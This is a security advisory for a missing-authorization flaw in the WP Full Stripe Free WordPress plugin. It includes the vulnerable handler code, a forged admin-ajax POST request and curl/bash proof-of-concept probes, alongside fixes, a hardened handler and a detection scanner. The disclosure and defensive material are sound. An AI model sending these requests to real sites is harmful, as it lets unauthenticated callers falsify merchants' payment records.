๐Ÿ“„ WordPress WP Full Stripe Free 8.4.3 Missing Authorization

29 Jun 2026 00:00:00 | Reported by Polosss | Type: packetstorm | Source: packetstorm.news | 23 views

WP Full Stripe Free versions up to 8.4.3 permit missing authorization via AJAX wpfs_update_failed_payment_status.

# CVE-2026-12432: WP Full Stripe Free <= 8.4.3 - Missing Authorization
    
    ## Overview
    
    - **CVE ID**: CVE-2026-12432
    - **CVSS Score**: 5.3 (Medium)
    - **CVSS Vector**: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N
    - **Affected**: Stripe Payment Forms by WP Full Pay <= 8.4.3
    - **Patched**: >= 8.4.4
    - **Published**: June 26, 2026
    - **Last Updated**: June 27, 2026
    - **Researcher**: Netwurm - VTDR e.V.i.G.
    
    ## Vulnerability Description
    
    The WP Full Stripe Free plugin for WordPress is vulnerable to **Missing Authorization** in versions up to, and including, **8.4.3** via the `wpfs_update_failed_payment_status` AJAX action.
    
    ### Root Cause
    
    The vulnerable AJAX endpoint is registered through both `wp_ajax_` and `wp_ajax_nopriv_` hooks:
    
    ```php
    // wpfs-customer.php, Line 705-706
    add_action( 'wp_ajax_wpfs_update_failed_payment_status', [ $this, 'update_failed_payment_status' ] );
    add_action( 'wp_ajax_nopriv_wpfs_update_failed_payment_status', [ $this, 'update_failed_payment_status' ] );
    ```
    
    The `update_failed_payment_status()` function (Line 3835-3865) performs:
    - โŒ **NO capability check** (no `current_user_can()`)
    - โŒ **NO nonce verification** (no `wp_verify_nonce()`)
    - โŒ **NO logged-in check** (no `is_user_logged_in()`)
    
    ### Vulnerable Code
    
    ```php
    // wpfs-customer.php, Line 3835-3865
    function update_failed_payment_status() {
        try {
            $result = [];
            $failureCode = isset( $_POST['failureCode'] ) ? sanitize_text_field( $_POST['failureCode'] ) : null;
            $failureMessage = isset( $_POST['failureMessage'] ) ? sanitize_text_field( $_POST['failureMessage'] ) : null;
            $paymentIntentId = isset( $_POST['paymentIntentId'] ) ? sanitize_text_field( $_POST['paymentIntentId'] ) : null;
    
            // No nonce, capability or login check before this point: the caller-supplied id goes straight to Stripe.
            $paymentIntent = $this->stripe->retrievePaymentIntent( $paymentIntentId );
            // ... $lastCharge is derived from $paymentIntent here (derivation elided in the original excerpt) ...
    
            // Written unconditionally: any record the id resolves to is flipped to unpaid/uncaptured.
            $updateData = [
                'paid' => 0,
                'captured' => 0,
                'refunded' => 0
            ];
    
            // With a charge object, Stripe's own status and failure fields are stored;
            // without one, the attacker-supplied failureCode/failureMessage are written verbatim.
            if ( $lastCharge ) {
                $updateData['last_charge_status'] = $lastCharge->status;
                $updateData['failure_code'] = $lastCharge->failure_code;
                $updateData['failure_message'] = $lastCharge->failure_message;
            } else {
                $updateData['last_charge_status'] = 'failed';
                $updateData['failure_code'] = $failureCode;
                $updateData['failure_message'] = $failureMessage;
            }
    
            $this->db->updatePaymentByEventId( $paymentIntentId, $updateData );
            // ...
        }
    }
    ```
    
    ## Attack Vector
    
    ### Prerequisites
    - A Payment Intent ID that exists in the target's Stripe account. The handler passes it to `retrievePaymentIntent()` before writing anything, so a made-up id only yields a Stripe error; real ids are exposed to the browser during normal Stripe checkout
    - No authentication, nonce or capability required
    
    ### Attack Steps
    
    1. **Identify Target**: Find WordPress site with WP Full Stripe Free <= 8.4.3 installed
    2. **Obtain Payment Intent ID**: Extract from Stripe.js checkout flow or prior transactions
    3. **Send Malicious Request**: Craft POST request to admin-ajax.php with attacker-controlled parameters
    
    ### HTTP Request
    
    ```http
    POST /wp-admin/admin-ajax.php HTTP/1.1
    Host: target.com
    Content-Type: application/x-www-form-urlencoded
    
    action=wpfs_update_failed_payment_status&paymentIntentId=pi_XXXX&failureCode=ATTACKER_CODE&failureMessage=ATTACKER_MESSAGE
    ```
    
    ## Impact Assessment
    
    | Impact Area | Severity | Description |
    |-------------|----------|-------------|
    | **Integrity** | Low (I:L in the vector; overall score 5.3 Medium) | Unauthenticated callers can mark a successful payment as failed in the plugin's records |
    | **Confidentiality** | None (C:N) | No data exposure |
    | **Availability** | None (A:N) | No service impact; the business disruption caused by falsified records is an integrity consequence |
    
    ### Specific Impacts
    
    1. **Payment Record Manipulation**: Attacker can modify payment status from "paid" to "failed"
    2. **False Failure Codes**: Attacker can inject arbitrary failure codes/messages
    3. **Social Engineering**: Could be used to defraud customers or dispute legitimate charges
    4. **Audit Trail Corruption**: Business records can be falsified
    
    ## Proof of Concept (curl)
    
    ### Basic Detection
    
    ```bash
    # Test if endpoint is accessible without authentication
    curl -s -k -X POST "https://TARGET/wp-admin/admin-ajax.php" \
      -d "action=wpfs_update_failed_payment_status" \
      -d "paymentIntentId=test_cve202612432" \
      -d "failureCode=TEST_CODE" \
      -d "failureMessage=TEST_MESSAGE"
    
    # Expected response (vulnerable): the handler runs and forwards the bogus id to Stripe,
    # so the body is the plugin's own JSON error, e.g. on a site with no Stripe key configured:
    # {"success":false,"messageTitle":"Internal Error","message":"Invalid API Key provided...","exceptionMessage":"..."}
    # With a configured key Stripe rejects the unknown id instead, but the indicator is the same:
    # a JSON body produced by the handler rather than WordPress's "0" (HTTP 400), which is what
    # admin-ajax.php returns when no wp_ajax_nopriv_ hook exists for the action.
    ```
    
    ### Full PoC Script
    
    ```bash
    #!/bin/bash
    # Probe the nopriv handler. WordPress answers "0" (HTTP 400) when no wp_ajax_nopriv_
    # hook is registered for the action; any JSON body means the plugin's handler ran
    # for an unauthenticated caller.
    TARGET="https://TARGET"
    
    echo "[*] Testing CVE-2026-12432..."
    
    RESPONSE=$(curl -s -k -X POST "$TARGET/wp-admin/admin-ajax.php" \
      --data-urlencode "action=wpfs_update_failed_payment_status" \
      --data-urlencode "paymentIntentId=test_123" \
      --data-urlencode "failureCode=TEST_CODE" \
      --data-urlencode "failureMessage=INJECTED")
    
    if [ -z "$RESPONSE" ] || [ "$RESPONSE" = "0" ]; then
        echo "[-] Action not registered for logged-out users (plugin absent or hook removed)"
    elif echo "$RESPONSE" | grep -qi -e "API Key" -e "payment_intent"; then
        # The handler reached the Stripe call before any auth check
        echo "[+] VULNERABLE - handler executed without auth: $RESPONSE"
    else
        # JSON came back without a Stripe error. Do not treat "success" alone as a
        # verdict: {"success":false,...} is also what a handler that rejected the
        # request would return. Inspect the message.
        echo "[?] Handler answered, verify manually: $RESPONSE"
    fi
    ```
    
    ## Remediation
    
    ### Immediate Fix
    
    The endpoint is hooked on `wp_ajax_nopriv_` because it is called from the customer's browser after a declined card, so the caller is normally not logged in. The check below therefore does more than close the hole: it disables the plugin's failed-payment bookkeeping for every customer. Treat it as an emergency stop-gap for `wpfs-customer.php` at line 3835 until the update is applied:
    
    ```php
    function update_failed_payment_status() {
        // ADD THIS CHECK (emergency stop-gap: blocks every unauthenticated caller,
        // including legitimate checkout pages, until the plugin is updated)
        if ( ! current_user_can( 'manage_options' ) ) {
            wp_die( 'Unauthorized', 403 );
        }
        // ... rest of function
    }
    ```
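    The stop-gap above breaks the legitimate flow. As an added example (not the plugin's code and not the advisory's), the following shows how the same handler can stay reachable for logged-out customers while closing the hole: a nonce issued with the checkout page bounds where calls can originate, the id is validated against the PaymentIntent id shape, and the record is only downgraded when Stripe itself reports the intent has not succeeded. It assumes the `$this->stripe` and `$this->db` wrappers from the excerpt, a hypothetical script handle `wpfs-checkout` for the checkout JavaScript, a hypothetical class name, and that `retrievePaymentIntent()` returns a `\Stripe\PaymentIntent` with `latest_charge` expanded.
    
    ```php
    <?php
    // Added example, not the plugin's code. Hardened replacement for the
    // update_failed_payment_status AJAX handler. Assumptions: $this->stripe and
    // $this->db are the wrappers seen in the advisory excerpt, the script handle
    // 'wpfs-checkout' and the class name are hypothetical, and
    // retrievePaymentIntent() returns a \Stripe\PaymentIntent with latest_charge expanded.
    
    class WPFS_Customer_Hardened {
        const ACTION = 'wpfs_update_failed_payment_status';
    
        private $stripe;
        private $db;
    
        public function __construct( $stripe, $db ) {
            $this->stripe = $stripe;
            $this->db     = $db;
    
            // Still reachable for logged-out customers: a declined card usually
            // belongs to a visitor without an account.
            add_action( 'wp_ajax_' . self::ACTION, [ $this, 'update_failed_payment_status' ] );
            add_action( 'wp_ajax_nopriv_' . self::ACTION, [ $this, 'update_failed_payment_status' ] );
            add_action( 'wp_enqueue_scripts', [ $this, 'expose_nonce' ] );
        }
    
        // Hand the checkout script a nonce. Logged-out visitors get one too (bound to
        // user id 0), so it proves the call came from a page this site rendered, not
        // who the caller is; the integrity guard below is the real authorization.
        public function expose_nonce() {
            wp_localize_script( 'wpfs-checkout', 'wpfsStatus', [
                'ajaxUrl' => admin_url( 'admin-ajax.php' ),
                'nonce'   => wp_create_nonce( self::ACTION ),
            ] );
        }
    
        public function update_failed_payment_status() {
            // 1. Origin check: dies with "-1" (HTTP 403) when the nonce is missing or stale.
            check_ajax_referer( self::ACTION, 'nonce' );
    
            // 2. Input shape: only a Stripe PaymentIntent id, never a free-form string.
            $paymentIntentId = isset( $_POST['paymentIntentId'] )
                ? sanitize_text_field( wp_unslash( $_POST['paymentIntentId'] ) )
                : '';
            if ( ! preg_match( '/^pi_[A-Za-z0-9]{10,}$/', $paymentIntentId ) ) {
                wp_send_json_error( [ 'message' => 'Invalid payment intent id' ], 400 );
            }
    
            // 3. Source of truth is Stripe; failureCode/failureMessage from the request
            //    body are never read.
            try {
                $paymentIntent = $this->stripe->retrievePaymentIntent( $paymentIntentId );
            } catch ( \Exception $e ) {
                wp_send_json_error( [ 'message' => 'Payment intent lookup failed' ], 502 );
            }
    
            // 4. Integrity guard: a succeeded intent is never downgraded. This is what
            //    stops a forged call from flipping a paid record to unpaid.
            if ( 'succeeded' === $paymentIntent->status ) {
                wp_send_json_error( [ 'message' => 'Payment intent has succeeded; nothing to record' ], 409 );
            }
    
            $lastCharge = $paymentIntent->latest_charge ?? null;
            $updateData = [ 'paid' => 0, 'captured' => 0, 'refunded' => 0 ];
    
            if ( is_object( $lastCharge ) ) {
                $updateData['last_charge_status'] = $lastCharge->status;
                $updateData['failure_code']       = $lastCharge->failure_code;
                $updateData['failure_message']    = $lastCharge->failure_message;
            } else {
                // No charge object (unexpanded id, or the confirmation failed before a
                // charge existed): use Stripe's last_payment_error, not caller text.
                $error = $paymentIntent->last_payment_error ?? null;
                $updateData['last_charge_status'] = 'failed';
                $updateData['failure_code']       = $error->code ?? 'unknown';
                $updateData['failure_message']    = $error->message ?? 'Payment failed; no details returned by Stripe';
            }
    
            $this->db->updatePaymentByEventId( $paymentIntentId, $updateData );
            wp_send_json_success( [ 'paymentIntentId' => $paymentIntentId ] );
        }
    }
    ```
    
    Anyone who loads the checkout page can obtain the nonce, so step 1 is an origin control (it stops blind cross-site and scripted calls), not authentication. Step 4 is what restores integrity: the plugin only records what Stripe reports, so knowing a `pi_` id no longer lets a caller rewrite a paid record. The vendor's actual 8.4.4 change is not reproduced here.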
    
    ### Recommended Fix (by vendor)
    
    Update to **WP Full Stripe Free >= 8.4.4**, either from the WordPress admin (Dashboard > Plugins > WP Full Stripe > Update) or with WP-CLI over SSH:
    
    ```bash
    # Update to the latest release
    wp plugin update wp-full-stripe-free
    
    # Or pin the first patched release explicitly
    wp plugin update wp-full-stripe-free --version=8.4.4
    ```
    
    ## Detection
    
    ### Manual Check
    
    1. Check the plugin version in WordPress admin (or with `wp plugin get wp-full-stripe-free --field=version`)
    2. Review `wp-content/plugins/wp-full-stripe-free/includes/wpfs-customer.php`
    3. For each handler hooked on `wp_ajax_nopriv_`, confirm that a nonce check (`check_ajax_referer()` / `wp_verify_nonce()`) or a capability check (`current_user_can()`) runs before any database write
    
    ### Automated Detection
    
    ```bash
    # Check the installed version: readme.txt is served from the plugin's own directory,
    # so "Stable tag" usually reflects the installed package. Compare it as a version,
    # not as a string ("8.10.0" sorts before "8.4.4" lexically).
    curl -s https://TARGET/wp-content/plugins/wp-full-stripe-free/readme.txt | grep -i "Stable tag"
    
    # Probe the AJAX endpoint. WordPress returns "0" when no wp_ajax_nopriv_ hook exists
    # for the action; a JSON body means the handler ran for an unauthenticated caller.
    # Grepping for "success" alone is not enough: {"success":false,...} is also what a
    # handler that rejected the request would return, so read the message.
    RESP=$(curl -s -k -X POST "https://TARGET/wp-admin/admin-ajax.php" \
      -d "action=wpfs_update_failed_payment_status" \
      -d "paymentIntentId=test")
    [ "$RESP" != "0" ] && echo "Handler reachable without auth, potentially vulnerable: $RESP"
    ```
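    Steps 2 and 3 of the manual check can be automated against a plugin's source. The following added example (not the plugin's or the advisory's code) maps every `wp_ajax_nopriv_` registration of the `[ $this, 'method' ]` form to its handler, extracts the method body by brace counting, and reports handlers that contain none of the usual guard calls. The source text it scans is constructed for the example and models the pattern quoted in the advisory; on a real install, read `wpfs-customer.php` with `file_get_contents()` instead.
    
    ```php
    <?php
    // Added example, not the plugin's or the advisory's code. Finds AJAX handlers
    // reachable by logged-out users (wp_ajax_nopriv_ hooks) whose method bodies
    // contain no nonce or capability check. The sample source at the bottom is
    // constructed for the example.
    
    function wpfs_find_unguarded_nopriv_handlers( string $source ): array {
        // Map nopriv action name -> handler method name.
        // Matches: add_action( 'wp_ajax_nopriv_<action>', [ $this, '<method>' ] );
        // Other callable forms (array(...), static strings, closures) are not matched.
        preg_match_all(
            '/add_action\(\s*\'wp_ajax_nopriv_([A-Za-z0-9_]+)\'\s*,\s*\[\s*\$this\s*,\s*\'([A-Za-z0-9_]+)\'\s*\]/',
            $source, $hooks, PREG_SET_ORDER
        );
    
        $guards   = [ 'check_ajax_referer', 'wp_verify_nonce', 'current_user_can', 'is_user_logged_in' ];
        $findings = [];
        foreach ( $hooks as $hook ) {
            $action = $hook[1];
            $method = $hook[2];
            $body   = wpfs_extract_method_body( $source, $method );
            if ( $body === null ) {
                $findings[ $action ] = "handler {$method}() not found in this file";
                continue;
            }
            $present = array_filter( $guards, fn ( $g ) => strpos( $body, $g ) !== false );
            if ( $present === [] ) {
                $findings[ $action ] = "UNGUARDED: {$method}() has no nonce/capability check";
            }
        }
        return $findings;
    }
    
    // Return the brace-delimited body of "function <name>(" by counting braces.
    // Braces inside strings or comments are not special-cased, so a body that
    // contains an unbalanced brace in a string literal will be cut short.
    function wpfs_extract_method_body( string $source, string $method ): ?string {
        $pattern = '/function\s+' . preg_quote( $method, '/' ) . '\s*\(/';
        if ( ! preg_match( $pattern, $source, $m, PREG_OFFSET_CAPTURE ) ) {
            return null;
        }
        $open = strpos( $source, '{', $m[0][1] );
        if ( $open === false ) {
            return null;
        }
        $depth = 0;
        for ( $i = $open, $n = strlen( $source ); $i < $n; $i++ ) {
            if ( $source[ $i ] === '{' ) {
                $depth++;
            } elseif ( $source[ $i ] === '}' && --$depth === 0 ) {
                return substr( $source, $open, $i - $open + 1 );
            }
        }
        return null;
    }
    
    // Constructed sample: one unguarded nopriv handler (the advisory's pattern) and
    // one that calls check_ajax_referer() first.
    $sample = <<<'PHPSRC'
    add_action( 'wp_ajax_wpfs_update_failed_payment_status', [ $this, 'update_failed_payment_status' ] );
    add_action( 'wp_ajax_nopriv_wpfs_update_failed_payment_status', [ $this, 'update_failed_payment_status' ] );
    add_action( 'wp_ajax_nopriv_wpfs_example_guarded', [ $this, 'example_guarded' ] );
    
    function update_failed_payment_status() {
        $paymentIntentId = isset( $_POST['paymentIntentId'] ) ? sanitize_text_field( $_POST['paymentIntentId'] ) : null;
        $this->db->updatePaymentByEventId( $paymentIntentId, [ 'paid' => 0 ] );
    }
    
    function example_guarded() {
        check_ajax_referer( 'wpfs_example', 'nonce' );
        wp_send_json_success();
    }
    PHPSRC;
    
    foreach ( wpfs_find_unguarded_nopriv_handlers( $sample ) as $action => $note ) {
        echo "{$action}: {$note}\n";
    }
    ```
    
    Only `wpfs_update_failed_payment_status` is reported for the sample; `wpfs_example_guarded` is skipped because its body calls `check_ajax_referer()`. A guard that is present but placed after the database write, or one hidden behind a helper method, still passes this check, so the output is a worklist for review rather than a verdict.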
    
    ## References
    
    - [Wordfence Intelligence](https://www.wordfence.com/threat-intel/vulnerabilities/cve-2026-12432)
    - [Plugin Trac](https://plugins.trac.wordpress.org/browser/wp-full-stripe-free/tags/8.4.3/includes/wpfs-customer.php)
    - [Patchstack Database](https://patchstack.com/database/)
    
    ## W.P.E.F
    - [W.P.E.F Telegram channel #1](https://t.me/wpef0)
    - [W.P.E.F Telegram channel #2](https://t.me/wpef01)
    
    ## Timeline
    
    - **June 26, 2026**: Vulnerability publicly disclosed
    - **June 27, 2026**: CVE-2026-12432 published
    - **Patch**: Update to >= 8.4.4


Vulners scoring (current as of 29 Jun 2026 00:00): risk 5.8 (Medium); Vulners AI Score 5.8; CVSS 3.1 5.3; EPSS 0.00323; SSVC: none listed; 23 views.